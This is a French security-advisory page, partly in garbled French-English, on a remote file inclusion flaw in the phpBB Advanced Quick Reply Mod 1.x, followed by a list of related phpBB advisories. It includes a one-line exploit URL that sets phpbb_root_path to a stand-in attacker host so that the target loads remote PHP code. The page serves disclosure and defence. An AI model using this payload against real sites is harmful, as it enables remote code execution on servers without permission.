Sécurité informatique

securite informatique
     SECURINFOS
     in English
     Bulletins sécurité
     Docs sécurité
     Logiciels sécurité
     Vieux Logiciels
     Forum sécurité
     Services
     Définitions
     Astuces Windows
     MetaSploit
     M$ OPcodes
     Passwords
     Dictionnaires
     Contact
     Liens

SECURINFOS.INFO - Bulletins de sécurité informatique, Alertes et Protection

phpBB Advanced Quick Reply Mod l'exécution de commandes arbitraires

21/01/2007 00H04
Référence Secunia : SA7519 
Date de publication : 2002-11-14

Risque : Elevé. Niveau 4 sur 5.
Impact : Accès au système
Lieu : A distance


Solutions :
Non corrigée


Produit :
phpBB Advanced Quick Reply Mod 1.x

Description :
phpBB Advanced Quick Reply Mod utilise a variable comme le chemin à un fichier de configuration, cela permet à des utilisateurs malicieux à fournir un serveur path à un serveur web distant.

Just enter l'URL suivante pour inclure du code PHP arbitraire:
http://victime/quick_reply.php?phpbb_root_path=http://attacker/&mode=smiles
Ceci va retrieve:
http://attacker/extension.inc


Solutions :
Change the php code, pour que le chemin à extension.inc est hardcoded plutôt que a variable.


Vulnérabilité découverte par :

Luke (HVA)




Les noms, marques et enseignes cités sur ce site sont la propriété de leurs déposants respectifs.

Derniers bulletins de sécurité informatique

Bulletins de sécurité informatiques relatifs

20081209 phpBB Tag Board Module id Vulnérabilité d'Injection SQL 3
20081113 phpBB Small ShoutBox Module id Vulnérabilité d'Injection SQL 3
20080924 Advanced Electron Forum PHP Vulnérabilités d'Exécution de Code 4
20080918 Quick Cms Lite admin php Cross Site Scripting 2
20080918 Quick Cart admin php Cross Site Scripting 2
20080726 Advanced Guestbook include path Parameter Inclusion de Fichiers
20080716 php Help Agent content Vulnérabilité d'Inclusion de Fichier
20080415 phpBB Deux Vulnérabilités de Contournement de la Sécurité
20080327 Quick Tftp Server Pro Long Mode Vulnérabilité de Dépassement de Tampon
20080225 php Download Manager content Vulnérabilité d'Inclusion de Fichier
20080126 phpBB Private Message Deletion Requete Cross Site Forgée
20080117 php residence cognome cerca Vulnérabilité d'Injection SQL
20071024 php basic basicFramework root Vulnérabilité d'Inclusion de Fichier
20071002 phpBB phpbb openid Module openid root path Inclusion de Fichiers
20070919 phpBB Styles Demo Module Injection SQL et Cross Site Scripting
20070815 Advanced mIRC Integration Plugin id3 Tag Input Validation Error
20070727 Advanced Webhost Billing System AWBS Divulgation d'Informations
20070719 phpBB SupaNav Module phpbb root path Inclusion de Fichiers
20070604 Quick Cart sLanguage Vulnérabilité d'Inclusion de Fichier Local
20070521 Advance Flow Vulnérabilité Cross Site Scripting
20070403 Advanced Website Creator Vulnérabilité d'Injection SQL
20070330 Advanced Login root Vulnérabilité d'Inclusion de Fichier
20070205 phpBB phpbb root path Vulnérabilité d'Inclusion de Fichier
20070112 Quick Cart p Vulnérabilité Cross Site Scripting
20061209 phpBB privmsg php Requete Cross Site Forgée et Cross Site Scripting
20061107 Advanced Guestbook include path Parameter Inclusion de Fichiers
20061101 phpBB Spider Friendly Module phpbb root path Vulnérabilité d'Inclusion de Fichier
20061018 phpBB News Defilante Horizontale phpbb root path Inclusion de Fichiers
20061016 phpBB lat2cyr phpbb root path Vulnérabilité d'Inclusion de Fichier
20061016 phpBB Archive pour Search Engines phpbb root path Inclusion de Fichiers
20061009 phpBB User Viewed Posts Tracker phpbb root path Inclusion de Fichiers
20061006 phpBB Security Suite IP Logger phpbb root path Inclusion de Fichiers
20061005 phpBB Nivisec Static Topics phpbb root path Vulnérabilité d'Inclusion de Fichier
20060929 phpBB XS phpbb root path Vulnérabilité d'Inclusion de Fichier
20060925 Advanced Clan Script content Vulnérabilité d'Inclusion de Fichier
20060918 phpBB XS phpbb root path Vulnérabilité d'Inclusion de Fichier
20060907 php download script file Parameter Traversée de Répertoire
20060719 Quick n Easy FTP Server LIST Command Buffer Overflow
20060718 phpBB Mail2Forum Module m2f root path Inclusion de Fichiers
20060626 phpBB THoRCMS Add On phpbb root path Inclusion de Fichiers
20060530 phpBB Blend Portal System Module phpbb root path Inclusion de Fichiers
20060530 phpBB Activity Mod Plus Module phpbb root path Inclusion de Fichiers
20060529 phpBB Nivisec Hacks List Module Inclusion de Fichier Local
20060529 php residence Vulnérabilités d'Insertion de Script
20060516 phpBB Upload Avatar from à URL Remote HTTP Request Faille
20060515 phpBB foing Module phpbb root path Inclusion de Fichiers
20060502 phpBB TopList phpbb root path Vulnérabilité d'Inclusion de Fichier
20060502 phpBB Advanced GuestBook phpbb root path Inclusion de Fichiers
20060502 Advanced Poll User Agent Vulnérabilité d'Injection SQL
20060501 phpBB Knowledge Base Mod Vulnérabilité d'Inclusion de Fichier
20060403 phpBB cur password Vulnérabilité Cross Site Scripting
20060324 Quick n Easy Web Server ASP Code Disclosure Vulnérabilité
20060207 phpBB gen rand string Predictable RNG
20060206 phpBB Referer Header Session ID Disclosure
20060131 phpBB Rlink Module url Vulnérabilité Cross Site Scripting
20060102 phpBB url bbcode Vulnérabilité d'Insertion de Script
20051222 phpBB Chatspot Module Deux Vulnérabilités
20051219 phpBB Allow HTML Insertion de Script Faille de Sécurité
20051122 Advanced Poll Vulnérabilité Cross Site Scripting
20051031 phpBB Vulnérabilités
20051024 phpBB Vulnérabilité d'Insertion de Script
20050921 phpBB Remote Avatar Divulgation d'Informations Faille
20050803 Quick and Easy FTP Server Débordement de Tampon à Distance
20050721 phpBB BBcode url Vulnérabilité d'Insertion de Script
20050704 Quick Dirty PHPSource Printer Vulnérabilité de Traversée de Répertoires
20050628 phpBB highlight Exécution de code PHP et Insertion de Script
20050513 phpBB Attachment Mod Module Realname Vulnérabilité
20050511 Quick Forum Topic Vulnérabilité d'Insertion de Script
20050511 Quick Cart sWord Vulnérabilité Cross Site Scripting
20050509 phpBB BBcode Vulnérabilité d'Insertion de Script
20050428 phpBB Personal Notes Module p Vulnérabilité d'Injection SQL
20050420 phpBB phpbb Auction Module Vulnérabilités d'Injection SQL
20050325 phpBB Topic calendar start Vulnérabilité Cross Site Scripting
20050308 phpBB Autologin Contournement de la Sécurité
20050307 phpBB Signature Vulnérabilité d'Insertion de Script
20050228 phpBB autologinid Contournement de la Sécurité
20050222 phpBB Avatar Functions Divulgation d'Informations et Deletion
20050211 Mod python publisher py Disclosure of Object Information
20041213 phpBB Attachment Mod Deux Vulnérabilités
20041119 phpBB Vulnérabilités Diverses
20041119 phpBB Cash Mod Arbitrary Vulnérabilité d'Inclusion de Fichier
20040722 phpBB Cross Site Scripting Vulnérabilités
20040713 phpBB Cross Site Scripting et Vulnérabilités Non spécifiées
20040624 php exec dir Exécution de Commande Bypass Vulnérabilité
20040421 phpBB IP Spoofing Probleme
20040329 phpBB privmsg php Vulnérabilité d'Injection SQL
20040329 phpBB Vulnérabilités Diverses
20040324 Mod Survey Script et SQL Insertion Vulnérabilité
20040323 phpBB profile php Cross Site Scripting Vulnérabilité
20040315 phpBB Injection SQL et Cross Site Scripting Vulnérabilités
20040301 phpBB postorder Parameter Cross Site Scripting Vulnérabilité
20031230 phpBB Vulnérabilité d'Injection SQL
20031201 Mod python Vulnérabilité de Déni de Service
20031027 Advanced Poll execution de code arbitraire
20030910 phpBB URL BBCode Tag Vulnérabilité Cross Site Scripting
20030819 phpBB Cross Site Scripting Vulnérabilité
20030623 phpBB topic id Vulnérabilité d'Injection SQL
20030602 Quick and Easy FTP Server Multiple Connection DoS
20030520 php proxima name Parameter Vulnérabilités d'Inclusion de Fichiers Locaux
20030506 Mod Survey SYSBASE Déni de Service
20030401 Mod survey survey manipulation
20030225 phpBB page header php Vulnérabilité d'Injection SQL
20030217 php Forum revelation informations utilisateur
20030117 phpBB SQL injection
20021230 php wordwrap heap overflow
20021127 phpBB Vulnérabilité d'Insertion de Script
20021119 phpBB highlight Vulnérabilité Cross Site Scripting
20021114 phpBB Advanced Quick Reply Mod execution de code arbitraire
20021010 phpBB revelation adresses IPs utilisateurs
 
Securite informatique

JA-PSI - Sécurité informatique - Tous droits réservés
formation sécurité informatiqe